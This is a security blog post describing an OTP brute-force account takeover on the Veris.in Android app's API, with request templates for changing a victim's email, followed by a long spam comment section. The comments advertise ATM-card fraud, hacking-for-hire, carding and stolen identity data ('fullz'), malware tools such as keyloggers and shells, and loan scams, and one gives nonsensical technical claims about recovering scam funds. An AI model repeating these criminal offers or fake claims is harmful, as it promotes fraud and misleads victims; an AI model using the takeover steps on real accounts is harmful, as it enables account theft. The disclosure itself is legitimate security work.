Veris.in Account Takeover

Hey Guys! Today I'll share you my Account takeover finding on Veris.in, So no more waste of time and start.



I installed Android app of Veris and started testing it, In Veris app we need to first verify our number and then we can register, While doing this i captured my request and try to bruteforce the OTP and noticed that there was no rate limitation so now i can use anyone's number in my account. So i did reported it, Now that was not a big deal, Then i started testing further after so many things my mind just noticed that every request have this type of structure,

POST /api/v1/*Any Functionality*/ HTTP/1.1
Authorization: token b910cxxx2ac02f3a8xxxxxxxxxxxxxxxxxxxxxxx
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; )
Host: live.veris.in
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 26

The thing i noticed that there is not like user session thing, it was working on a token ( In Authorization Header) Which is an authorization to API of veris but my mind said "from where did it came from :O like i have not entered any password" And then i said "Oh lol i entered One Time Password", 

So what happening here is when we enter number it sends a OTP to it and then after OTP verification it generates a token to authenticate us with API and check is the number match with any account in database, if does exist we'll be logged in that account. Now as i mentioned earlier "No Rate Limit on OTP" Now i can use this to generate OTP for your number and get a token for it by bruteforcing and Bhoom I can use the token to modify info of your account.

POST /api/v1/change_email/ HTTP/1.1
Authorization: token **BRUTEFORCED TOKEN GOES HERE**
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; )
Host: live.veris.in
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 26

{"email":"hacker@hack.com"}

If the number is NOT registered it will give a response like this one (Token Generated)

If the number is registered it will give a response like this one (Token Generated)

Video Proof of Concept






23 comments:

  1. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email (hydracards63@gmail.com) for how to get it and it cost,and how to also hack credit cards and send the money to your self,we are located around the world, these cards works on any ATM machine and it works according to it's activation.

    ………. EXPLANATION OF HOW THESE CARD WORKS……….

    You just slot in these card into any ATM Machine and it will automatically bring up a MENU of 1st VAULT #1,000, 2nd VAULT #5,000, RE-PROGRAMMED, EXIT, CANCEL. Just click on either of the VAULTS, and it will take you to another SUB-MENU of ALL, OTHERS, EXIT, CANCEL. Just click on others and type in the amount you wish to withdraw from the ATM and you have it cashed instantly… Done.

    ***NOTE: DON’T EVER MAKE THE MISTAKE OF CLICKING THE “ALL” OPTION. BECAUSE IT WILL TAKE OUT ALL THE AMOUNT OF THE SELECTED VAULT. To get the card email (hydracards63@gmail.com)Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email (hydracards63@gmail.com) for how to get it and it cost,and how to also hack credit cards and send the money to your self,we are located around the world, these cards works on any ATM machine and it works according to it's activation.

    ………. EXPLANATION OF HOW THESE CARD WORKS……….

    You just slot in these card into any ATM Machine and it will automatically bring up a MENU of 1st VAULT #1,000, 2nd VAULT #5,000, RE-PROGRAMMED, EXIT, CANCEL. Just click on either of the VAULTS, and it will take you to another SUB-MENU of ALL, OTHERS, EXIT, CANCEL. Just click on others and type in the amount you wish to withdraw from the ATM and you have it cashed instantly… Done.

    ***NOTE: DON’T EVER MAKE THE MISTAKE OF CLICKING THE “ALL” OPTION. BECAUSE IT WILL TAKE OUT ALL THE AMOUNT OF THE SELECTED VAULT. To get the card email (hydracards63@gmail.com)

    ReplyDelete
    Replies
    1. I'm a professional in all kinds of hacking services, which leads me into giving out a blank ATM card to all individuals & serious minded people only. I hack, clone ATM cards worth's the total sum of $500,000.00 United States Dollars, with this card you can withdraw the sum of $3500 as daily limit till you cash out the sum total said sum & this cards has been cloned & hacked in the manner that you'll never be caught not detected during usage. For more info, kindly email us: fastatmhackers@gmail.com OR Call/WhatsApp: +16626183756



      Delete
    2. Hello everyone..Welcome to my free masterclass strategy where i teach experience and inexperience traders the secret behind a successful trade.And how to be profitable in trading I will also teach you how to make a profit of $12,000 USD weekly and how to get back all your lost funds feel free to email me on(brucedavid004@gmail.com) or whataspp number is +22999290178

      Delete
    3. Veris.In Account Takeover - Yet Another Infosec Blog >>>>> Download Now

      >>>>> Download Full

      Veris.In Account Takeover - Yet Another Infosec Blog >>>>> Download LINK

      >>>>> Download Now

      Veris.In Account Takeover - Yet Another Infosec Blog >>>>> Download Full

      >>>>> Download LINK JL

      Delete
  2. Hello Everybody, My name is Mrs Sharon Sim. I live in Singapore and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of S$250,000.00 to start my life all over as i am a single mother with 3 kids I met this honest and GOD fearing man loan lender that help me with a loan of S$250,000.00 SG. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs Sharon, that refer you to him. contact Dr Purva Pius,via email:{urgentloan22@gmail.com} Thank you.

    ReplyDelete
    Replies
    1. BookMyEssay has wide variety of experts and professionals that work hard to give updated information and also help in the application of every updated information in the field of Dissertation Discussion and Conclusion Writing Help .

      Delete
  3. دليل التجهيزات الشامل اكبر دليل يقوم بتوفير تجهيزات فنادق باسرع ما يمكن حيث اننا نتخصص بتوفير كافه معدات سوبر ماركت بارخص الاسعار ونقوم بتركيبها وصيانتها بشكل متميز
    تابع موقعنا عبر
    http://www.hotel-restaurant-eg.com

    ReplyDelete
  4. سارعوا بالتعاقد مع شركة مكافحة حشرات في مصر وسنصل اليكم في الحال ونقوم بخدمات ابادة حشرات المنزل باحترافيه وطردها من المكان الي الابد كما نقوم بخدمات فحص دوريه للتأكد من نظافه المكان من اى حشرات
    تابع موقعنا عبر
    www.anti-insects.com

    ReplyDelete
  5. الاحترافيه لدي اطباء مركز زراعة الشعر في تركيا لاجراء الابحاث العلمية الحديثة ليتمكنوا من زراعة الشعر في تركيا بطريقة طبيه امنه اعتمادا علي افضل انواع العلاج لمنع تساقط الشعر ومعالجة الصلع
    تابع موقعنا عبر
    www.hairtransplant1.com

    ReplyDelete
  6. يتم استخدام اجهزة رش حديثة تساعد فريق عماله شركة مكافحة حشرات بالخبر في رش المبيدات في الاماكن الضيقه لقتل الحشرات والتخلص منها نهائيا , وتعد ابراج دبي من اكبر الشركات التى تهتم بالاعمال المنزلية فنقوم بتنظيف البيارات باحترافيه ولذلك يفضل الجميع شركة تسليك مجاري بالدمام لخدماتها المميزه واسعارها التى تناسب الجميع
    تابع موقعنا للتفاصيل
    http://abraj-dubai.net/%D8%B4%D8%B1%D9%83%D8%A7%D8%AA-%D9%85%D9%83%D8%A7%D9%81%D8%AD%D8%A9-%D8%A7%D9%84%D9%86%D9%85%D9%84-%D8%A7%D9%84%D8%A7%D8%A8%D9%8A%D8%B6-%D8%A8%D8%A7%D9%84%D8%AF%D9%85%D8%A7%D9%85/

    ReplyDelete
  7. خدمة العملاء في توكيل ال جي تتوافر علي مدار 24 ساعه يوميا وتقوم بالرد علي استفسارات عملائه الكرام في الحال وتقوم بارسال مهندسيين وفنيين صيانة ال جي الي العملاء في المنازل للتمكن من اصلاح وصيانة الاجهزة الكهربائية
    للتفاصيل زوروا موقعنا عبر
    www.lgmaintenance.com

    ReplyDelete
  8. تتمكن من خلال احدي فروع صيانة يونيون اير المتواجدة في مصر من الحصول علي خدمات صيانة تكييفات يونيون اير باسرع ما يمكن وبشكل احترافي حيث اننا ندعم في شركة يونيون اير خدمات التصليح والصيانة للتكييفات والمراوح
    تابع موقعنا للتفاصيل
    http://unionairemaintenance.com

    ReplyDelete
  9. اهم انواع الحجر الهاشمي من شركة ابو الهول
    حجر هاشمي

    ReplyDelete
  10. ARE YOU WILLING TO HIRE THE REAL HACKERS TO GET YOUR CYBER PROBLEMS FIXED WITH SWIFT RESPONSE?
    AND ARE YOU A VICTIM OF THE BINARY OPTION SCAM?
    Solving a problem for which you know there’s an answer is like climbing a mountain with a guide, along a trail someone else has laid.
    This post is actually for those who are willing to turn their lives around for the better, either financial-wise, relationship-wise or businesses.
    Our primary reason for this development is to ensure that those in need of help don’t get ripped off by forgeries.
    Who are the GlobalHackers?
    We are group of skilled professional hackers driven by passion to make the internet a safer place and render proficient services to those having cyber problems.
    This is a global idea that navigates a newbie to a prominent encounter ( Fully immersed to a degree that the subject in question Is a disorienting worthwhile experience on merits).
    Globalhackers has grown and expanded since it formation over the years due to the experience and professionalism of our management and technical staff. Our strength is based on our ability to bring together active cyber security professionals who individually has acquired enormous exposure in the world of HACKING
    As part of our corporate goals, providing value added services to meet our client needs and requirements has been our sustaining impetus.
    The new development on the Globalhackers platform is to assign to you the right HACKER to deal with your Particular kind of cyber issues depending on the kind of cyber problems you are willing to get fixed.
    Here, you would be refer to a legit professional hacker known for massive skills and security abilities.
    Skilled and trained on
    ▪Social media hacks (facebook, twitter, instagram,snapchat)
    ▪Email hacks
    ▪phone hacks
    ▪bitcoin hacks.
    ▪verified PayPal account hacks
    ▪database hacks
    ▪credit card top up
    ▪university score upgrade
    ▪money transfer
    ▪binary option funds recovery. ( recovered $4,372,063 million)
    The binary option scam is another problem facing the internet today.
    How do you avoid binary option scam and what do you do if you are a victim of the scam.
    Be wary of adverts on the internet and mostly on social media promising high returns from binary options trading. The binary option is one of the highly recorded scam on the internet.This are a form of fixed-odds betting.
    People investor their hard earned funds in the scammers website and at the end, they wouldn't be able to take their profit plus their investment too. The Globalhacks are breeding effort to put an end to these unbearable swindle scheme taking over the intenet and taking a solid step forward to render solution to those affected by the fleece… we have striven to make tenacious effort to relief those who were victims off their traumatic feeling of loss. ( We Are Here To Help Recover Your Stolen Funds).
    Here would be our cybersecurity techniques to retrieving back the victims stolen funds.
    ●The binary broker website would be traced down using a game over peer to peer network via a bug attack,
    The bug network secure an SQL trace on a hiding server, decentralizing it and redirecting the server to a soft plus network. A soft plus network enable varieties of unique web coding languages, Through that process reveals thier hidden networking source, displaying the changed web page made default.
    This unveil the hiding information traceable to track down the scammers and their embezzled central fund reserve system.
    HOW DO YOU STAY AWAY FROM FALSE BUSINESSES ONLINE?
    * Making enquiries for their firm reference number (FRN)
    * Contact details and barter their calls on the switchboard number and also
    * Never make use of the link in a website or an email from the firm propitiating you for an investment.
    For more enquiries and help, contact:
    Clarksoncoleman (at) gmail. com
    Info.globalhacks (at) gmail. com
    globalhacktech (at) protonmail. com
    HackerOne©️LLC 2030.

    ReplyDelete
  11. Part-Time Degree in singapore is planned explicitly for understudies who want to work in avionics related vocations. This specialized tasks program gives an occasion to those understudies new to flying to obtain avionics explicit information through flight related coursework.

    ReplyDelete
  12. We are the team of Assignment Helper experts and we are providing the best assignment help service to aspirants across the world. If you need assignment writing service at cheap price, then reach us.

    ReplyDelete
  13. We have done many assignments and projects but we will surely agree with the fact that technology helps us to get a solid assignment and knowledge. It is technically a very necessary and important thing that we always imbibe technology to complete any assignment which we want to complete. Assignment help or assignment helpers also help in working on important goals for a purposeful and complete work structure.

    ReplyDelete
  14. Veris.In Account Takeover - Yet Another Infosec Blog >>>>> Download Now

    >>>>> Download Full

    Veris.In Account Takeover - Yet Another Infosec Blog >>>>> Download LINK

    >>>>> Download Now

    Veris.In Account Takeover - Yet Another Infosec Blog >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete
  15. Guy's Whats-up !

    Do you wanna learn Hacking/Spamming/Carding ?
    Do you wanna start your earning from home ?

    Here I'm..
    I'm offering complete packages, for Learning:
    Hacking , Spamming, Carding, Spying etc
    *Legit & Valid Tools & tutorials Stuff.

    Contact 24/7
    Tele-gram = @leadsupplier
    Skype/Wickr = peeterhacks
    I'C'Q = 752 822 040

    All Type of Tools Available
    MAILERS
    SENDERS
    KEY LOGGERS
    KALI LINUX FULL
    BTC CRACKER/FLASHER
    BOMBER
    VIRUSES
    SHELLS
    BRUTES
    CPANELS
    HACKING TUTS & STUFF
    CARDING METHODS FOR CASHOUT & SPAMMING
    FB/WA HACK TIPS & TRICKS
    ETC

    Fresh Fullz are available too
    CC FULLZ
    SSN DOB DL FULLZ (BULK QTY)
    HIGH CS FULLZ (700+)
    PREMIUM FULLZ
    SBA/PUA/UI FILLING FULLZ
    EMPLOYMENT FULLZ
    BUSINESS FULLZ

    Get In Touch :
    Skype/Wickr = peeterhacks
    I'C'Q = 752 822 040
    Tele-gram = @killhacks

    Fresh Spammed & Verified
    Invalid stuff will be replace
    Bulk order preferable

    ReplyDelete
  16. I really appreciate you providing this fantastic blog. incredibly motivating and beneficial. I hope you share more of your thoughts in the future. It's crucial to press the spacebar so that the game's spacebar counter can assist you as you compete with your pals. Visit this website spacebar click counter.

    ReplyDelete

Powered by Blogger.